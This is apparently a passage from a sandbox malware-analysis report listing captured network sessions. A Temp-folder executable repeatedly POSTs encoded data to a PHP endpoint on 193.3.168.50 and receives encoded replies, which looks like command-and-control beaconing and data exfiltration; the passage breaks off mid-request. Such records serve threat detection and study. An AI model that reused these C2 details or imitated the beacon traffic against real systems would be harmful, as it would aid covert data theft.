                                                                                                                  Dec 5, 2024 10:54:29.018651962 CET1060OUTData Raw: 5f 5f 5f 5c 5c 5e 5a 56 5a 58 51 52 55 5f 5a 5f 50 53 5d 53 59 52 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ___\\^ZVZXQRU_Z_PS]SYRWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-;0=]?_#466]81[ ;-8'<<V7)X$8E##?)#G $],
                                                                                                                  Dec 5, 2024 10:54:29.900537014 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:30.133487940 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:29 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  56192.168.2.449875193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:30.373761892 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:30.721587896 CET1060OUTData Raw: 5a 5e 5a 5f 5c 5d 5f 55 5a 58 51 52 55 51 5a 5f 50 55 5d 52 59 52 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z^Z_\]_UZXQRUQZ_PU]RYRWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-,0-X< ;<27:7. 7[%,,S#1=['<@! 4)=#G $],=
                                                                                                                  Dec 5, 2024 10:54:31.612174034 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:31.845249891 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:31 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  57192.168.2.449881193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:32.089801073 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:32.440354109 CET1060OUTData Raw: 5a 5d 5f 5c 59 5c 5a 52 5a 58 51 52 55 56 5a 5b 50 55 5d 5c 59 5f 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z]_\Y\ZRZXQRUVZ[PU]\Y_WB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\./=Y<8\ %!/<"!),3+\'/8V#!%_'-0"$W*#G $],!
                                                                                                                  Dec 5, 2024 10:54:33.327554941 CET25INHTTP/1.1 100 Continue


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  58192.168.2.449885193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:33.389946938 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:33.737289906 CET1936OUTData Raw: 5f 5a 5a 59 59 5d 5f 55 5a 58 51 52 55 50 5a 59 50 50 5d 5d 59 5a 57 49 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _ZZYY]_UZXQRUPZYPP]]YZWI^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.-#%X?9]#)8?- 7.0?%,!")0>A"0$V)-#G $],
                                                                                                                  Dec 5, 2024 10:54:34.626430988 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:34.861550093 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 25 5b 25 38 2c 1c 26 3f 2c 08 3c 33 3c 5b 2d 1d 06 06 33 3e 35 42 27 3a 3b 11 29 2a 2c 04 22 2e 36 5d 2b 5f 30 0b 3f 09 2f 0f 3d 28 20 58 00 1a 26 14 34 0b 2c 5b 3a 3a 20 1e 25 13 31 04 33 04 39 5b 29 29 2f 53 3e 1d 34 57 26 3e 07 0e 2a 0a 26 0a 2d 37 36 06 39 10 3d 05 25 3f 2a 52 0e 17 21 51 3d 07 24 5e 22 31 3e 0f 3e 31 30 04 3c 2f 3b 1f 26 28 29 08 20 00 29 57 30 30 35 53 30 21 3d 0e 30 28 38 00 31 2f 3c 5b 29 03 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98%[%8,&?,<3<[-3>5B':;)*,".6]+_0?/=( X&4,[:: %139[))/S>4W&>*&-769=%?*R!Q=$^"1>>10</;&() )W005S0!=0(81/<[) _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  59192.168.2.449887193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:33.684422970 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:34.034198046 CET1060OUTData Raw: 5f 51 5f 53 5c 5d 5a 50 5a 58 51 52 55 51 5a 59 50 50 5d 5b 59 5e 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _Q_S\]ZPZXQRUQZYPP][Y^WG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-- <* Y759/<2 )8:?]0/<7=_'-;!3;>=#G $],=
                                                                                                                  Dec 5, 2024 10:54:34.934099913 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:35.169424057 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:34 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  60192.168.2.449890193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:35.417795897 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:35.810736895 CET1060OUTData Raw: 5a 5c 5f 59 5c 5c 5a 50 5a 58 51 52 55 5f 5a 52 50 55 5d 53 59 59 57 46 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: Z\_Y\\ZPZXQRU_ZRPU]SYYWF^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.Z/ "+97.;<49:3<72%'>,A5'*#G $],
                                                                                                                  Dec 5, 2024 10:54:36.661237955 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:36.893187046 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:36 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  61192.168.2.449895193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:37.136306047 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1056
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:37.487129927 CET1056OUTData Raw: 5a 59 5a 5b 59 59 5f 55 5a 58 51 52 55 57 5a 5d 50 57 5d 5f 59 5a 57 42 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: ZYZ[YY_UZXQRUWZ]PW]_YZWB^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-/ .=)0\ 6/=[ *(S.3%</#1)$>8"=-#G $],=
                                                                                                                  Dec 5, 2024 10:54:38.377856970 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:38.613437891 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:38 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  62192.168.2.449901193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:38.854660034 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1056
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:39.206872940 CET1056OUTData Raw: 5f 58 5f 5d 5c 5e 5a 5f 5a 58 51 52 55 57 5a 58 50 54 5d 5b 59 5c 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _X_]\^Z_ZXQRUWZXPT][Y\WH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\-;+9 %>[.<&49+-#<%,072'./!0#*#G $],)


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  63192.168.2.449906193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:39.998816967 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1936
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:40.346879959 CET1936OUTData Raw: 5f 5b 5f 5e 59 59 5a 54 5a 58 51 52 55 5e 5a 5b 50 51 5d 59 59 5e 57 47 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _[_^YYZTZXQRU^Z[PQ]YY^WG^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\./+]4"^;/=Y7?.#3]3<720>?##$W*#G $],
                                                                                                                  Dec 5, 2024 10:54:41.236069918 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:41.469062090 CET349INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 39 38 0d 0a 09 11 26 02 27 2b 24 1e 24 3c 01 52 3c 33 30 59 3a 0d 27 5e 33 07 22 1a 25 39 23 1c 29 29 20 03 35 03 2a 1e 3c 39 0e 0f 2b 27 3c 53 2a 38 20 58 00 1a 25 07 21 21 2c 5a 2e 5f 34 13 25 2e 2a 18 27 2e 25 19 3e 3a 28 0f 3e 1d 3b 0c 32 3d 21 0b 2a 0d 00 0c 2c 27 36 06 2e 10 26 5d 31 2f 2a 52 0e 17 21 57 29 00 28 5b 20 32 35 56 3d 31 27 5f 3c 3c 33 11 33 28 26 16 20 2d 3e 0d 24 0e 2a 0b 33 0c 3e 1d 33 01 2b 5b 32 3f 01 02 2a 29 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98&'+$$<R<30Y:'^3"%9#)) 5*<9+'<S*8 X%!!,Z._4%.*'.%>:(>;2=!*,'6.&]1/*R!W)([ 25V=1'_<<33(& ->$*3>3+[2?*) _. W1WT0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  64192.168.2.449907193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:40.122859955 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:40.476926088 CET1060OUTData Raw: 5f 51 5f 5b 59 5b 5f 50 5a 58 51 52 55 55 5a 5f 50 56 5d 5a 59 59 57 48 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _Q_[Y[_PZXQRUUZ_PV]ZYYWH^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.Y,Y?_8X7&/4*#93+]%/ R4'"7)-#G $],-
                                                                                                                  Dec 5, 2024 10:54:41.356594086 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:41.588990927 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:41 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  65192.168.2.449909193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:41.829008102 CET417OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Dec 5, 2024 10:54:42.174653053 CET1060OUTData Raw: 5f 5c 5f 5b 59 59 5a 5e 5a 58 51 52 55 51 5a 59 50 5f 5d 5b 59 58 57 45 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _\_[YYZ^ZXQRUQZYP_][YXWE^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\.X,!? ]4>^.?>!)#.#$#4!=X'!$==#G $],=
                                                                                                                  Dec 5, 2024 10:54:43.067507982 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:43.301377058 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:42 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  66192.168.2.449915193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:43.545988083 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/octet-stream
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                                                  Host: 193.3.168.50
                                                                                                                  Content-Length: 1060
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Dec 5, 2024 10:54:43.929065943 CET1060OUTData Raw: 5f 58 5f 52 59 5f 5f 52 5a 58 51 52 55 5e 5a 52 50 5f 5d 5a 59 5a 57 45 5e 5f 5d 53 54 5b 55 5d 59 58 50 50 50 5c 51 5e 47 52 53 50 51 5a 5f 5b 56 56 5c 59 58 57 5a 51 50 58 56 50 58 5c 51 5d 5a 5c 5f 59 51 5c 55 55 43 52 42 50 5d 5b 59 51 52 56
                                                                                                                  Data Ascii: _X_RY__RZXQRU^ZRP_]ZYZWE^_]ST[U]YXPPP\Q^GRSPQZ_[VV\YXWZQPXVPX\Q]Z\_YQ\UUCRBP][YQRVZSTAZZSRQ]X_PRXX[VTX[Y^Q_STTY\PYQR_]XV[__T\VCT\RQQY\]ZX]_ZR^Z\T[Y]PXTY_C_^PZ_^[U_\X[QV_\VYXU_RGY^]]RP\--0<:; 6>Z,<X#*4, '$, #-_3"U)=#G $],
                                                                                                                  Dec 5, 2024 10:54:44.791619062 CET25INHTTP/1.1 100 Continue
                                                                                                                  Dec 5, 2024 10:54:45.051865101 CET200INHTTP/1.1 200 OK
                                                                                                                  Server: nginx
                                                                                                                  Date: Thu, 05 Dec 2024 09:54:44 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 4;Y\W0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  67192.168.2.449921193.3.168.50807244C:\Users\user\AppData\Local\Temp\kahKUDRlEYHfKIalWlM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Dec 5, 2024 10:54:45.293869019 CET441OUTPOST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1
